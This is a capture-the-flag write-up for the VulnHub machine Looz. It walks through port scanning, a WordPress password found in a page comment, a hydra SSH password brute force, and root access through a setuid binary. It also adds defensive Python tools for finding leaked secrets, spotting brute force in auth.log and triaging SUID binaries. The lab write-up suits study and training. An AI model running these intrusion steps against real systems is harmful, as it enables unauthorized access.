Looz
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:76:42:e1 1 60 PCS Systemtechnik GmbH
192.168.56.119 08:00:27:76:a1:7d 1 60 PCS Systemtechnik GmbH
Kali's built-in netdiscover identifies the target as 192.168.56.119 (192.168.56.1 is the VirtualBox host-only adapter on the physical host and 192.168.56.100 is VirtualBox's DHCP server, so .119 is the only other host on the segment).
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.119 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 22:57 EST
Nmap scan report for 192.168.56.119
Host is up (0.00039s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4802386769719099d50b194c98da50c (RSA)
| 256 3d525e29fb2f29e801e45d1ba11ef34b (ECDSA)
|_ 256 f0f477dc3d53c3c5358287a5ba57b449 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Home
|_http-generator: Nicepage 3.15.3, nicepage.com
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
3306/tcp open mysql MySQL 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
| Thread ID: 5
| Capabilities flags: 63486
| Some Capabilities: FoundRows, Support41Auth, ConnectWithDatabase, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: Lu(eFnu$PEJ"ilc.WN`y
|_ Auth Plugin Name: mysql_native_password
8081/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://192.168.56.119/
MAC Address: 08:00:27:76:A1:7D (Oracle VirtualBox virtual NIC)
Service Info: Host: 172.17.0.3; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.96 seconds
Getting a shell
Port 3306
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ mysql -uroot -p -h 192.168.56.119
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ mysql -uroot -p -h 192.168.56.119
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)
This was a quick check for a weak or empty root password over the network: a guessed password and an empty password are both denied, so move on. The error text does confirm that the MariaDB server accepts connections from the Kali host at 192.168.56.206, which is worth remembering if database credentials turn up later.
Port 80
Browsing port 80 returns a Nicepage site; its page source contains the following comment:
<!--- john don't forget to remove this comment, for now wp password is y0uC@n'tbr3akIT--->
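A comment like this is worth hunting for systematically rather than by eye. The following Python script is an added example, not part of the original write-up: it pulls every HTML comment out of a page and flags those that mention credential-like words, extracting the value wherever a "password is X" / "pass=X" / "token: X" pattern is present. The sample page is constructed for the example (modelled on the comment found on port 80 and padded with two more comments); for a live target, replace SAMPLE_HTML with the body returned by a GET to the site.

```python
import re

# Constructed sample page for this example, modelled on the comment found in the
# port-80 source above; it is not the target's actual HTML.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head><title>Home</title>
<meta name="generator" content="Nicepage 3.15.3, nicepage.com">
</head><body>
<!--- john don't forget to remove this comment, for now wp password is y0uC@n'tbr3akIT--->
<!-- TODO: replace hero image -->
<p>Welcome</p>
<!-- db_user=wpuser db_pass=Sup3rS3cret -->
</body></html>
"""

# Inner text of every HTML comment. Non-standard openers such as "<!---" (extra
# dashes), exactly as in the comment above, are tolerated.
COMMENT_RE = re.compile(r"<!--+(.*?)--+>", re.DOTALL)

# Words that, inside a comment, usually mean a developer left a secret behind.
# Letter lookarounds instead of \b so "db_pass" and "wp-password" still match.
SENSITIVE_RE = re.compile(
    r"(?<![A-Za-z])(pass(?:word|wd)?|pwd|secret|token|api[_-]?key|credential)(?![A-Za-z])",
    re.IGNORECASE,
)

# A value attached to such a word: "password is X", "pass=X", "token: X".
VALUE_RE = re.compile(
    r"(pass(?:word|wd)?|pwd|secret|token|api[_-]?key)\s*(?:is|=|:)\s*(\S+)",
    re.IGNORECASE,
)


def extract_comments(html: str) -> list:
    """Return the stripped inner text of every HTML comment in the document."""
    return [m.group(1).strip() for m in COMMENT_RE.finditer(html)]


def find_leaks(html: str) -> list:
    """Return comments that mention credential-like words, together with any values
    that can be pulled out of them (candidates to try, not confirmed secrets)."""
    hits = []
    for comment in extract_comments(html):
        if not SENSITIVE_RE.search(comment):
            continue
        values = [value for _, value in VALUE_RE.findall(comment)]
        hits.append({"comment": comment, "values": values})
    return hits


if __name__ == "__main__":
    for hit in find_leaks(SAMPLE_HTML):
        print(f"[!] comment: {hit['comment']!r}")
        print(f"    candidate secrets: {hit['values']}")
```

The keyword list is deliberately loose; a few false positives from words like "compass" cost nothing, whereas a missed "db_pass=" costs a foothold.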
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ nikto -h http://192.168.56.119
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.119
+ Target Hostname: 192.168.56.119
+ Target Port: 80
+ Start Time: 2023-02-03 23:36:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2023-02-03 23:37:00 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (nginx/1.18.0) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
Port 8081
Browsing port 8081 redirects to port 80. This is a different web stack from port 80 (Apache 2.4.38 on Debian with PHP 7.4.20, versus nginx on Ubuntu), and the host 172.17.0.3 in nmap's Service Info suggests it is a Docker container behind the Ubuntu host. Try directory brute-forcing with gobuster:
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ gobuster dir -u http://192.168.56.119:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.119:8081
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/02/03 23:41:12 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.119:8081/: Get "http://192.168.56.119:8081/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
gobuster's initial request to / timed out after 10 seconds, so no directory listing was obtained.
Try nikto instead:
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ nikto -h http://192.168.56.119:8081
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.119
+ Target Hostname: 192.168.56.119
+ Target Port: 8081
+ Start Time: 2023-02-03 23:42:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.20
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://wp.looz.com/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7918 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-02-03 23:43:24 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
The nikto results show that port 8081 is running WordPress. Open the login page in a browser:
http://192.168.56.119:8081/wp-login.php
The page source references the host name wp.looz.com (also visible in the Link header nikto reported), which has to resolve to the target, so add it to /etc/hosts:
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.119 wp.looz.com
Refreshing /wp-login.php now shows the classic WordPress login page. The username and password are already known from the comment on port 80 (john / y0uC@n'tbr3akIT), so try them against the admin panel:
The login succeeds (the first attempt failed with a message saying cookies must be enabled; the second attempt, with nothing changed, worked).
Trying to replace the 404.php template through the theme editor and clicking Update File produces an error:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
This is WordPress's loopback check: after a theme or plugin file edit it requests its own site URL to make sure the change did not introduce a fatal error, and reverts the edit if that request fails. Here the site URL is wp.looz.com, which presumably does not resolve from inside the web container, so the file editor cannot be used to drop a shell.
Other ways of uploading a shell failed as well. The Users page in the WordPress admin, however, shows a second administrator, gandalf, and the box exposes SSH, so try hydra against that account's SSH password:
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ hydra -l gandalf -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.119
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-04 00:08:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.119:22/
[STATUS] 136.00 tries/min, 136 tries in 00:01h, 14344264 to do in 1757:53h, 15 active
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 14344084 to do in 2269:39h, 15 active
[STATUS] 98.71 tries/min, 691 tries in 00:07h, 14343709 to do in 2421:46h, 15 active
[STATUS] 98.22 tries/min, 1475 tries in 00:15h, 14342925 to do in 2433:43h, 15 active
[STATUS] 97.24 tries/min, 3016 tries in 00:31h, 14341384 to do in 2458:08h, 15 active
[STATUS] 96.46 tries/min, 4535 tries in 00:47h, 14339865 to do in 2477:49h, 15 active
[STATUS] 96.66 tries/min, 6091 tries in 01:03h, 14338309 to do in 2472:23h, 15 active
[22][ssh] host: 192.168.56.119 login: gandalf password: highschoolmusical
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-04 01:17:21
At roughly 97 tries per minute the crack took just over an hour: gandalf / highschoolmusical.
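From the defender's side, the run above leaves a very recognisable trace in the target's auth.log: thousands of "Failed password for gandalf from 192.168.56.206" lines at a steady rate, eventually followed by one "Accepted password". The following Python detector is an added example, not part of the original write-up: it counts failures per source address in a sliding window, raises an alert once a threshold is crossed, and records a later successful login from the same source as a probable compromise. The log lines are constructed to mimic Ubuntu's sshd syslog format (with far fewer guesses than hydra's real volume); the threshold, window and year are the example's assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Ubuntu sshd lines in syslog format, e.g.
# "Feb  4 00:08:30 looz sshd[1234]: Failed password for gandalf from 192.168.56.206 port 51234 ssh2"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2"
)


def parse_line(line: str, year: int = 2023):
    """Return (timestamp, result, user, ip) for a password-auth line, else None.
    syslog timestamps carry no year, so one is supplied (assumption)."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=5), year=2023) -> dict:
    """Flag a source IP once it accrues `threshold` failed passwords inside a sliding
    `window`; afterwards, record any accepted login from that IP as a probable compromise."""
    recent = defaultdict(deque)      # ip -> failure timestamps still inside the window
    failures = defaultdict(int)
    users = defaultdict(set)
    alerts = {}
    for line in lines:
        parsed = parse_line(line, year)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            failures[ip] += 1
            users[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:     # q always holds ts itself, so it never empties
                q.popleft()
            if ip not in alerts and len(q) >= threshold:
                alerts[ip] = {"first_alert": ts, "success": None}
        elif ip in alerts:               # Accepted after an alert
            alerts[ip]["success"] = (ts, user)
    for ip, alert in alerts.items():
        alert["failures"] = failures[ip]
        alert["users"] = sorted(users[ip])
    return alerts


def _syslog(ts: datetime, result: str, user: str, ip: str, port: int) -> str:
    """Build one constructed auth.log line in sshd's format (day is space-padded)."""
    return (f"{ts:%b} {ts.day:>2} {ts:%H:%M:%S} looz sshd[{1000 + port % 1000}]: "
            f"{result} password for {user} from {ip} port {port} ssh2")


# Constructed log: one mistyped password by a legitimate user, then a run of guesses
# from the attacker address seen above and the eventual success an hour later.
_start = datetime(2023, 2, 4, 0, 8, 30)
SAMPLE_LOG = [
    _syslog(datetime(2023, 2, 3, 23, 50, 0), "Failed", "alatar", "192.168.56.1", 40001),
    _syslog(datetime(2023, 2, 3, 23, 50, 6), "Accepted", "alatar", "192.168.56.1", 40002),
] + [
    _syslog(_start + timedelta(seconds=i), "Failed", "gandalf", "192.168.56.206", 50000 + i)
    for i in range(40)
] + [
    _syslog(datetime(2023, 2, 4, 1, 17, 15), "Accepted", "gandalf", "192.168.56.206", 50999),
    "Feb  4 01:17:16 looz sshd[1999]: pam_unix(sshd:session): session opened for user gandalf by (uid=0)",
]

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(f"[ALERT] {ip}: {alert['failures']} failures for {alert['users']}, "
              f"first flagged {alert['first_alert']:%H:%M:%S}, later success: {alert['success']}")
```

A single legitimate typo never reaches the threshold, while a password-guessing run is flagged within seconds of starting; the "success after alert" field is what turns a noisy brute-force alert into an incident.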
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ ssh gandalf@192.168.56.119
gandalf@192.168.56.119's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-74-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 04 Feb 2023 08:32:46 AM UTC
System load: 0.0 Processes: 133
Usage of /: 80.0% of 6.82GB Users logged in: 0
Memory usage: 41% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for enp0s3: 192.168.56.119
63 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
gandalf@looz:~$ id
uid=1001(gandalf) gid=1001(gandalf) groups=1001(gandalf)
gandalf@looz:~$
gandalf@looz:/home$ cd alatar
gandalf@looz:/home/alatar$ ls -alh
total 44K
drwxr-xr-x 5 alatar alatar 4.0K Jun 7 2021 .
drwxr-xr-x 4 root root 4.0K Jun 7 2021 ..
-rw------- 1 alatar alatar 45 Jun 7 2021 .bash_history
-rw-r--r-- 1 alatar alatar 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 alatar alatar 3.7K Feb 25 2020 .bashrc
drwx------ 2 alatar alatar 4.0K Jun 7 2021 .cache
drwxrwxr-x 2 alatar alatar 4.0K Jun 7 2021 Private
-rw-r--r-- 1 alatar alatar 807 Feb 25 2020 .profile
-rw-r--r-- 1 alatar alatar 0 Jun 6 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 alatar alatar 33 Jun 7 2021 user.txt
-rw------- 1 alatar alatar 734 Jun 7 2021 .viminfo
drwxrwxr-x 4 alatar alatar 4.0K Jun 7 2021 wordpress
gandalf@looz:/home/alatar$ cat user.txt
9acf80de68fbb344573762e84cced6f3
gandalf@looz:/home/alatar$
User flag obtained.
Privilege escalation
gandalf@looz:/home/alatar/Private$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount
/home/alatar/Private/shell_testv1.0
gandalf@looz:/home/alatar$ cd Private/
gandalf@looz:/home/alatar/Private$ ls -alh
total 28K
drwxrwxr-x 2 alatar alatar 4.0K Jun 7 2021 .
drwxr-xr-x 5 alatar alatar 4.0K Jun 7 2021 ..
-rwsr-xr-x 1 root root 17K Jun 7 2021 shell_testv1.0
gandalf@looz:/home/alatar/Private$ ./shell_testv1.0
root@looz:/home/alatar/Private# cd /root
root@looz:/root# ls -alh
total 52K
drwx------ 5 root root 4.0K Jun 7 2021 .
drwxr-xr-x 21 root root 4.0K Jun 7 2021 ..
-rw------- 1 root root 498 Jun 7 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 7 2021 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 33 Jun 7 2021 root.txt
-rw-r--r-- 1 root root 50 Jun 7 2021 rundocker.sh
-rw-r--r-- 1 root root 66 Jun 7 2021 .selected_editor
drwxr-xr-x 3 root root 4.0K Jun 6 2021 snap
drwx------ 2 root root 4.0K Jun 6 2021 .ssh
-rw------- 1 root root 8.0K Jun 7 2021 .viminfo
root@looz:/root# cat root.txt
ab17850978e36aaf6a2b8808f1ded971
root@looz:/root#
shell_testv1.0 is a setuid-root binary that was left in alatar's home directory; running it drops straight into a root shell. Privilege escalation succeeded and the root flag is obtained.
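A setuid-root binary under a user's home directory stands out in the find output above, but on a larger box the list is long and mostly noise. This Python helper is an added example, not the write-up's own code: it buckets a find listing by where distro packages do and do not install setuid helpers, and also provides a live equivalent of the find command. The prefix lists are the example's own heuristic rather than an authoritative baseline; anything in the "review" bucket still needs a manual look (for example dpkg -S <path> to see whether a package owns it), and the "expected" bucket only means the location is normal, not that the binary is patched.

```python
import os
import stat

# The `find / -perm -4000 -type f` output from above, used here as sample input.
SUID_LISTING = """
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount
/home/alatar/Private/shell_testv1.0
"""

# Where distro packages install setuid helpers (example's own heuristic).
PACKAGED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/",
                     "/bin/", "/sbin/", "/lib/", "/snap/")
# Where no package ever puts one: a setuid-root file here was made by hand.
UNPACKAGED_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/", "/opt/",
                       "/srv/", "/var/www/", "/root/")


def classify(path: str) -> str:
    """'suspicious' for hand-placed locations, 'expected' for package locations,
    'review' for anything else."""
    if path.startswith(UNPACKAGED_PREFIXES):
        return "suspicious"
    if path.startswith(PACKAGED_PREFIXES):
        return "expected"
    return "review"


def triage(listing: str) -> dict:
    """Bucket each path of a find listing; 'suspicious' is what to look at first."""
    buckets = {"suspicious": [], "review": [], "expected": []}
    for line in listing.splitlines():
        path = line.strip()
        if path:
            buckets[classify(path)].append(path)
    return buckets


def scan_suid(root: str = "/"):
    """Live equivalent of `find / -perm -4000 -type f`: yield (path, owner uid, class)
    for every regular file with the setuid bit. Unreadable directories are skipped,
    as find's 2>/dev/null did above; root-owned (uid 0) entries are the ones that matter."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_uid, classify(path)


if __name__ == "__main__":
    for bucket, paths in triage(SUID_LISTING).items():
        for path in paths:
            print(f"{bucket:10s} {path}")
```

On the listing above the only entry that lands in "suspicious" is /home/alatar/Private/shell_testv1.0, which is exactly the binary that hands out the root shell.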
Lessons learned
- After logging into the WordPress admin panel, inspect the available information carefully, especially the user list: there are two administrator accounts.
- Then brute-force, even though on this box the crack takes a very long time.